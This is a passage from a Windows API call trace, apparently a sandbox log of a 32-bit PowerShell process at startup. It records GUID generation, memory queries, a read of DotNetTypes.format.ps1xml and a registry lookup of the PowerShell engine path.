lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.285] GetLastError () returned 0x57 [0054.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.285] GetLastError () returned 0x57 [0054.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x2ce130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0054.285] GetLastError () returned 0x57 [0054.306] VirtualQuery (in: lpAddress=0x2cd630, lpBuffer=0x2ce630, dwLength=0x1c | out: lpBuffer=0x2ce630*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.309] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xb533bec5, Data2=0xb361, Data3=0x46bf, Data4=([0]=0x81, [1]=0xeb, [2]=0x96, [3]=0xb6, [4]=0x9e, [5]=0xa, [6]=0x73, [7]=0xbc))) returned 0x0 [0054.310] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x6cfd21b1, Data2=0x7b82, Data3=0x4991, Data4=([0]=0x88, [1]=0xb0, [2]=0x1c, [3]=0xac, [4]=0x24, [5]=0xc, [6]=0x52, [7]=0xc3))) returned 0x0 [0054.311] VirtualQuery (in: lpAddress=0x2cd6a8, lpBuffer=0x2ce6a8, dwLength=0x1c | out: lpBuffer=0x2ce6a8*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.311] VirtualQuery (in: lpAddress=0x2cd6a8, lpBuffer=0x2ce6a8, dwLength=0x1c | out: lpBuffer=0x2ce6a8*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.311] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xa31569f, Data2=0x24bf, Data3=0x4792, Data4=([0]=0xbd, [1]=0x4a, [2]=0xa6, [3]=0x2a, [4]=0x8e, [5]=0xc0, [6]=0xe4, [7]=0xc2))) returned 0x0 [0054.316] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x1ea20fff, Data2=0xa94c, Data3=0x4c65, Data4=([0]=0x9f, [1]=0x46, [2]=0x4a, [3]=0xba, [4]=0xa5, [5]=0xc3, [6]=0x4c, [7]=0xfd))) returned 0x0 [0054.316] VirtualQuery (in: lpAddress=0x2cd7d4, lpBuffer=0x2ce7d4, dwLength=0x1c | out: lpBuffer=0x2ce7d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.316] VirtualQuery (in: lpAddress=0x2cd680, lpBuffer=0x2ce680, dwLength=0x1c | out: lpBuffer=0x2ce680*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.317] VirtualQuery (in: lpAddress=0x2cd680, lpBuffer=0x2ce680, dwLength=0x1c | out: lpBuffer=0x2ce680*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.317] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x4558a05b, Data2=0xf187, Data3=0x4ac3, Data4=([0]=0x93, [1]=0xbf, [2]=0xee, [3]=0x69, [4]=0x1f, [5]=0xb1, [6]=0xd7, [7]=0x54))) returned 0x0 [0054.317] VirtualQuery (in: lpAddress=0x2cd7d4, lpBuffer=0x2ce7d4, dwLength=0x1c | out: lpBuffer=0x2ce7d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.317] VirtualQuery (in: lpAddress=0x2cd6ec, lpBuffer=0x2ce6ec, dwLength=0x1c | out: lpBuffer=0x2ce6ec*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.319] VirtualQuery (in: lpAddress=0x2cd3a0, lpBuffer=0x2ce3a0, dwLength=0x1c | out: lpBuffer=0x2ce3a0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.319] VirtualQuery (in: lpAddress=0x2cd3a0, lpBuffer=0x2ce3a0, dwLength=0x1c | out: lpBuffer=0x2ce3a0*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.319] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xd16c24a7, Data2=0x3354, Data3=0x4c20, Data4=([0]=0xbc, [1]=0x32, [2]=0x5a, [3]=0x3b, [4]=0xe0, [5]=0x95, [6]=0x74, [7]=0xc2))) returned 0x0 [0054.319] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xec8b6134, Data2=0x4b4a, Data3=0x44a7, Data4=([0]=0xaf, [1]=0x2e, [2]=0x6e, [3]=0x4c, [4]=0xaa, [5]=0x2a, [6]=0x6b, [7]=0x78))) returned 0x0 [0054.319] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce3ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0054.319] GetLastError () returned 0x57 [0054.320] SetErrorMode (uMode=0x1) returned 0x1 [0054.320] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c [0054.320] GetLastError () returned 0x0 [0054.320] GetFileType (hFile=0x31c) returned 0x1 [0054.320] SetErrorMode (uMode=0x1) returned 0x1 [0054.320] GetFileType (hFile=0x31c) returned 0x1 [0054.320] ReadFile (in: hFile=0x31c, lpBuffer=0x2e98ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e98ce0*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.321] GetLastError () returned 0x0 [0054.322] ReadFile (in: hFile=0x31c, lpBuffer=0x2e98ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e98ce0*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.323] GetLastError () returned 0x0 [0054.323] ReadFile (in: hFile=0x31c, lpBuffer=0x2e98ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e98ce0*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.323] GetLastError () returned 0x0 [0054.323] ReadFile (in: hFile=0x31c, lpBuffer=0x2e98ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e98ce0*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.323] GetLastError () returned 0x0 [0054.324] ReadFile (in: hFile=0x31c, lpBuffer=0x2e98ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e98ce0*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.324] GetLastError () returned 0x0 [0054.324] ReadFile (in: hFile=0x31c, lpBuffer=0x2e98ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e98ce0*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.325] GetLastError () returned 0x0 [0054.325] ReadFile (in: hFile=0x31c, lpBuffer=0x2e98ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e98ce0*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.325] GetLastError () returned 0x0 [0054.325] ReadFile (in: hFile=0x31c, lpBuffer=0x2e98ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e98ce0*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.325] GetLastError () returned 0x0 [0054.326] ReadFile (in: hFile=0x31c, lpBuffer=0x2e98ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e98ce0*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.326] GetLastError () returned 0x0 [0054.326] ReadFile (in: hFile=0x31c, lpBuffer=0x2e98ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e98ce0*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.326] GetLastError () returned 0x0 [0054.326] ReadFile (in: hFile=0x31c, lpBuffer=0x2e98ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e98ce0*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.326] GetLastError () returned 0x0 [0054.326] ReadFile (in: hFile=0x31c, lpBuffer=0x2e98ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e98ce0*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.327] GetLastError () returned 0x0 [0054.327] ReadFile (in: hFile=0x31c, lpBuffer=0x2e98ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e98ce0*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.327] GetLastError () returned 0x0 [0054.327] ReadFile (in: hFile=0x31c, lpBuffer=0x2e98ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e98ce0*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.327] GetLastError () returned 0x0 [0054.327] ReadFile (in: hFile=0x31c, lpBuffer=0x2e98ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e98ce0*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.327] GetLastError () returned 0x0 [0054.327] ReadFile (in: hFile=0x31c, lpBuffer=0x2e98ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e98ce0*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.327] GetLastError () returned 0x0 [0054.329] ReadFile (in: hFile=0x31c, lpBuffer=0x2e98ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e98ce0*, lpNumberOfBytesRead=0x2ce954*=0x1000, lpOverlapped=0x0) returned 1 [0054.329] GetLastError () returned 0x0 [0054.330] ReadFile (in: hFile=0x31c, lpBuffer=0x2e98ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e98ce0*, lpNumberOfBytesRead=0x2ce954*=0xbce, lpOverlapped=0x0) returned 1 [0054.330] GetLastError () returned 0x0 [0054.330] ReadFile (in: hFile=0x31c, lpBuffer=0x2e9844e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e9844e*, lpNumberOfBytesRead=0x2ce954*=0x0, lpOverlapped=0x0) returned 1 [0054.330] GetLastError () returned 0x0 [0054.330] ReadFile (in: hFile=0x31c, lpBuffer=0x2e98ce0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2ce954, lpOverlapped=0x0 | out: lpBuffer=0x2e98ce0*, lpNumberOfBytesRead=0x2ce954*=0x0, lpOverlapped=0x0) returned 1 [0054.330] GetLastError () returned 0x0 [0054.330] CloseHandle (hObject=0x31c) returned 1 [0054.330] GetLastError () returned 0x0 [0054.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce4b4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0054.330] GetLastError () returned 0x0 [0054.330] SetErrorMode (uMode=0x1) returned 0x1 [0054.330] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2eb9cdc | out: lpFileInformation=0x2eb9cdc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a077cff, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a077cff, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2e8455c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0054.330] GetLastError () returned 0x0 [0054.330] SetErrorMode (uMode=0x1) returned 0x1 [0054.330] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0054.330] GetLastError () returned 0x0 [0054.331] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ce8d8 | out: phkResult=0x2ce8d8*=0x31c) returned 0x0 [0054.331] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ce920, lpData=0x0, lpcbData=0x2ce91c*=0x0 | out: lpType=0x2ce920*=0x1, lpData=0x0, lpcbData=0x2ce91c*=0x56) returned 0x0 [0054.331] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x2ce920, lpData=0x3b8428, lpcbData=0x2ce91c*=0x56 | out: lpType=0x2ce920*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x2ce91c*=0x56) returned 0x0 [0054.331] RegCloseKey (hKey=0x31c) returned 0x0 [0054.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0054.331] GetLastError () returned 0x0 [0054.331] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x2ce414, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0054.331] GetLastError () returned 0x0 [0054.335] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x8b1c8c20, Data2=0x5433, Data3=0x4a20, Data4=([0]=0x9f, [1]=0x10, [2]=0xf6, [3]=0x4e, [4]=0x6f, [5]=0x68, [6]=0x67, [7]=0x8))) returned 0x0 [0054.335] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xfecf8c87, Data2=0xe7ed, Data3=0x4432, Data4=([0]=0xa5, [1]=0xa2, [2]=0x8d, [3]=0xcb, [4]=0x71, [5]=0xde, [6]=0xdd, [7]=0xba))) returned 0x0 [0054.335] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xa80d2f80, Data2=0x9f36, Data3=0x428d, Data4=([0]=0xb6, [1]=0xcc, [2]=0x4f, [3]=0x4a, [4]=0x6b, [5]=0xe4, [6]=0xc, [7]=0x79))) returned 0x0 [0054.335] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x9f284578, Data2=0x4ba1, Data3=0x4379, Data4=([0]=0xb8, [1]=0xc0, [2]=0x1a, [3]=0x47, [4]=0xd9, [5]=0x69, [6]=0x78, [7]=0x6e))) returned 0x0 [0054.335] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x72eb6e10, Data2=0xa68c, Data3=0x43e9, Data4=([0]=0x89, [1]=0xc4, [2]=0x7e, [3]=0x92, [4]=0x0, [5]=0xbf, [6]=0xf2, [7]=0x8a))) returned 0x0 [0054.335] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xd1a24c96, Data2=0x5574, Data3=0x474b, Data4=([0]=0x82, [1]=0x81, [2]=0x5d, [3]=0x9e, [4]=0x3d, [5]=0x85, [6]=0xd7, [7]=0x2d))) returned 0x0 [0054.336] VirtualQuery (in: lpAddress=0x2cd680, lpBuffer=0x2ce680, dwLength=0x1c | out: lpBuffer=0x2ce680*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.336] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x33c8af24, Data2=0x2cb1, Data3=0x4efd, Data4=([0]=0x9a, [1]=0xda, [2]=0x37, [3]=0xa5, [4]=0x23, [5]=0xe8, [6]=0xb8, [7]=0xe2))) returned 0x0 [0054.336] VirtualQuery (in: lpAddress=0x2cd680, lpBuffer=0x2ce680, dwLength=0x1c | out: lpBuffer=0x2ce680*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.336] VirtualQuery (in: lpAddress=0x2cd680, lpBuffer=0x2ce680, dwLength=0x1c | out: lpBuffer=0x2ce680*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.336] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xa74d0974, Data2=0x44c1, Data3=0x45fa, Data4=([0]=0x88, [1]=0x9c, [2]=0x1, [3]=0xbf, [4]=0x77, [5]=0x40, [6]=0x67, [7]=0x19))) returned 0x0 [0054.336] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xc6c0b76b, Data2=0x660b, Data3=0x4d05, Data4=([0]=0x9e, [1]=0xa6, [2]=0xc9, [3]=0x7, [4]=0x41, [5]=0x88, [6]=0xb1, [7]=0xc5))) returned 0x0 [0054.337] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xf7c0709a, Data2=0x8099, Data3=0x4ddf, Data4=([0]=0xa4, [1]=0x11, [2]=0x5c, [3]=0xb3, [4]=0xb8, [5]=0x29, [6]=0x57, [7]=0xe0))) returned 0x0 [0054.337] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x7a144f37, Data2=0x6de8, Data3=0x47c2, Data4=([0]=0x8a, [1]=0xc1, [2]=0xed, [3]=0x44, [4]=0x7d, [5]=0x95, [6]=0x74, [7]=0x74))) returned 0x0 [0054.337] VirtualQuery (in: lpAddress=0x2cd680, lpBuffer=0x2ce680, dwLength=0x1c | out: lpBuffer=0x2ce680*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.337] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x7cf61fb2, Data2=0x34f4, Data3=0x4b94, Data4=([0]=0x9a, [1]=0xac, [2]=0x51, [3]=0x33, [4]=0xad, [5]=0x78, [6]=0x77, [7]=0xb9))) returned 0x0 [0054.337] VirtualQuery (in: lpAddress=0x2cd680, lpBuffer=0x2ce680, dwLength=0x1c | out: lpBuffer=0x2ce680*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.338] VirtualQuery (in: lpAddress=0x2cd680, lpBuffer=0x2ce680, dwLength=0x1c | out: lpBuffer=0x2ce680*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.338] VirtualQuery (in: lpAddress=0x2cd680, lpBuffer=0x2ce680, dwLength=0x1c | out: lpBuffer=0x2ce680*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.338] VirtualQuery (in: lpAddress=0x2cd680, lpBuffer=0x2ce680, dwLength=0x1c | out: lpBuffer=0x2ce680*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.339] VirtualQuery (in: lpAddress=0x2cd680, lpBuffer=0x2ce680, dwLength=0x1c | out: lpBuffer=0x2ce680*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.339] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xe2bddc07, Data2=0x2a81, Data3=0x49d6, Data4=([0]=0x8d, [1]=0xfc, [2]=0x9f, [3]=0xd8, [4]=0x5f, [5]=0x8d, [6]=0x25, [7]=0xd))) returned 0x0 [0054.339] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x106f1c9b, Data2=0x5aa1, Data3=0x4349, Data4=([0]=0xaf, [1]=0xd5, [2]=0xd1, [3]=0x84, [4]=0x75, [5]=0x82, [6]=0xec, [7]=0x86))) returned 0x0 [0054.340] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xc387043f, Data2=0x71a4, Data3=0x411e, Data4=([0]=0xa0, [1]=0x80, [2]=0x99, [3]=0x19, [4]=0x9a, [5]=0x1, [6]=0x99, [7]=0x93))) returned 0x0 [0054.340] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x5eccac52, Data2=0x6c7f, Data3=0x4c35, Data4=([0]=0xa2, [1]=0x46, [2]=0x5a, [3]=0xd0, [4]=0x6f, [5]=0x4b, [6]=0x5, [7]=0xf0))) returned 0x0 [0054.340] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x3fffadf4, Data2=0xe7aa, Data3=0x4093, Data4=([0]=0xad, [1]=0xe7, [2]=0x57, [3]=0xde, [4]=0x98, [5]=0xe1, [6]=0xa0, [7]=0x5f))) returned 0x0 [0054.340] VirtualQuery (in: lpAddress=0x2cd7d4, lpBuffer=0x2ce7d4, dwLength=0x1c | out: lpBuffer=0x2ce7d4*(BaseAddress=0x2cd000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0054.340] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xbaf16e3a, Data2=0x3ed1, Data3=0x482c, Data4=([0]=0x8b, [1]=0x8e, [2]=0x9b, [3]=0xa, [4]=0x25, [5]=0x5c, [6]=0xd5, [7]=0x5c))) returned 0x0 [0054.340] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x9fe3fcfd, Data2=0x939f, Data3=0x4f90, Data4=([0]=0xac, [1]=0x71, [2]=0x48, [3]=0x4, [4]=0xc8, [5]=0x87, [6]=0xa6, [7]=0xe))) returned 0x0 [0054.341] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xc5189cba, Data2=0xeaa6, Data3=0x4fbd, Data4=([0]=0x83, [1]=0xe1, [2]=0x27, [3]=0xea, [4]=0x85, [5]=0xd7, [6]=0xa9, [7]=0x55))) returned 0x0 [0054.341] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x5a6b6995, Data2=0x312f, Data3=0x4f22, Data4=([0]=0xba, [1]=0xc1, [2]=0xbd, [3]=0xc1, [4]=0xd, [5]=0x3f, [6]=0x4e, [7]=0xf1))) returned 0x0 [0054.341] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x311a3c17, Data2=0x8ef7, Data3=0x461b, Data4=([0]=0xba, [1]=0x3d, [2]=0x35, [3]=0x2f, [4]=0x2c, [5]=0x1e, [6]=0x97, [7]=0x1e))) returned 0x0 [0054.341] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xb4dc1b6e, Data2=0x39aa, Data3=0x4259, Data4=([0]=0xbb, [1]=0xd8, [2]=0x2d, [3]=0xf5, [4]=0xc7, [5]=0x19, [6]=0x40, [7]=0x13))) returned 0x0 [0054.341] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x78f70373, Data2=0x28ca, Data3=0x42fd, Data4=([0]=0x84, [1]=0x6, [2]=0xc9, [3]=0x94, [4]=0x93, [5]=0x5e, [6]=0x2, [7]=0x12))) returned 0x0 [0054.342] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x762b3d6f, Data2=0xced8, Data3=0x447b, Data4=([0]=0x80, [1]=0xce, [2]=0x3f, [3]=0xb7, [4]=0xbd, [5]=0xc6, [6]=0x91, [7]=0xf1))) returned 0x0 [0054.342] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x8e6afa11, Data2=0x8ce4, Data3=0x4367, Data4=([0]=0xbc, [1]=0xd3, [2]=0x7a, [3]=0x7f, [4]=0xa3, [5]=0x39, [6]=0xa6, [7]=0x56))) returned 0x0 [0054.342] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x1e02f299, Data2=0x3db3, Data3=0x4f10, Data4=([0]=0x8e, [1]=0xec, [2]=0x9a, [3]=0xcb, [4]=0xd2, [5]=0x1f, [6]=0x28, [7]=0xfb))) returned 0x0 [0054.342] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0x80c8219e, Data2=0xe554, Data3=0x487a, Data4=([0]=0x9c, [1]=0x80, [2]=0xdf, [3]=0x37, [4]=0x43, [5]=0x88, [6]=0xbd, [7]=0x9b))) returned 0x0 [0054.342] CoCreateGuid (in: pguid=0x2ce948 | out: pguid=0x2ce948*(Data1=0xbadbceb2, Data2=0xb708, Data3=0x4ca9, Data4=([0]=0x8a, [1]=0x49, [2]=0x67, [3]=0xd1, 